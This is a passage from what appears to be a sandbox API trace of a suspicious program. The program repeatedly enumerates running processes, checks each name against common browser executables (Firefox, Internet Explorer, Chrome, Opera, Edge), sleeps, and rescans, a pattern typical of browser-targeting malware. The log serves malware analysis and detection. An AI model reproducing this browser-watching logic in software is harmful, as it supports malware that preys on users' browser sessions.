lpString2="iexplore.exe") returned 1 [0220.053] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0220.053] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0220.053] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.053] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0220.054] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0220.054] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0220.054] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0220.054] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0220.054] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.054] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0220.054] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0220.054] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0220.054] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0220.054] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0220.054] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.054] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0220.055] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0220.055] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0220.055] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0220.055] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0220.055] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.055] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0220.055] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0220.055] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0220.056] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0220.056] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0220.056] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.056] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0220.056] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0220.056] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0220.056] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0220.056] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0220.056] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.056] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0220.057] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0220.057] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0220.057] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0220.057] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0220.057] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.057] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0220.057] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0220.057] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0220.057] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0220.057] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0220.057] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.057] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0220.058] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0220.058] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0220.058] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0220.058] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0220.058] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.058] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0220.058] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0220.058] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0220.058] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0220.058] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0220.058] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.058] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0220.059] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0220.059] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0220.059] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0220.059] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0220.059] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.059] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.060] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0220.060] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0220.060] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0220.060] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0220.060] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.060] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.060] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.060] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.060] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.060] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0220.060] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.060] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0220.061] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0220.061] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0220.061] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0220.061] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0220.061] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.061] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.061] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.061] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.061] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.061] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0220.061] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.061] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0220.062] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0220.062] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0220.062] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0220.062] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0220.062] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.062] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.062] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0220.063] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0220.063] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0220.063] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0220.063] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.063] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0220.063] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0220.063] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0220.063] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0220.063] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0220.063] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.063] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.064] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0220.064] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0220.064] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0220.064] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0220.064] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.064] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.064] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0220.064] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0220.064] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0220.064] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0220.064] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.064] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.065] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0220.065] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0220.065] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0220.065] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0220.065] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.065] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.065] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0220.065] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0220.065] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0220.066] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0220.066] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.066] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.066] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0220.066] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0220.066] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0220.066] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0220.066] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.066] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0220.067] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0220.067] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0220.067] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0220.067] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0220.067] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0220.067] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0220.067] CloseHandle (hObject=0xe8) returned 1 [0220.067] Sleep (dwMilliseconds=0x3e8) [0221.107] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0221.110] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.111] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0221.111] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0221.111] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0221.111] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0221.111] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0221.111] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.111] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0221.111] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0221.111] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0221.111] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0221.111] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0221.111] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.112] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0221.112] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0221.112] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0221.112] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0221.112] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.112] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.113] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0221.113] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0221.113] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0221.113] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0221.113] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.113] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.113] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0221.113] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0221.113] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0221.113] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0221.113] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.113] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.114] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0221.114] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0221.114] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0221.114] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0221.114] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.114] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.114] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0221.114] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0221.114] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0221.115] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0221.115] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.115] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.115] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0221.115] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0221.115] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0221.115] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0221.115] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.115] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.116] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0221.116] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0221.116] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0221.116] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0221.116] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.116] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0221.116] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0221.116] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0221.116] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0221.116] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0221.116] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.116] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.117] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.117] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.117] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.117] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0221.117] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.117] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.117] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.117] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.117] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.117] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0221.117] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.118] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.118] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.118] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.118] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.118] lstrcmpiA (lpString1="svchost.exe", 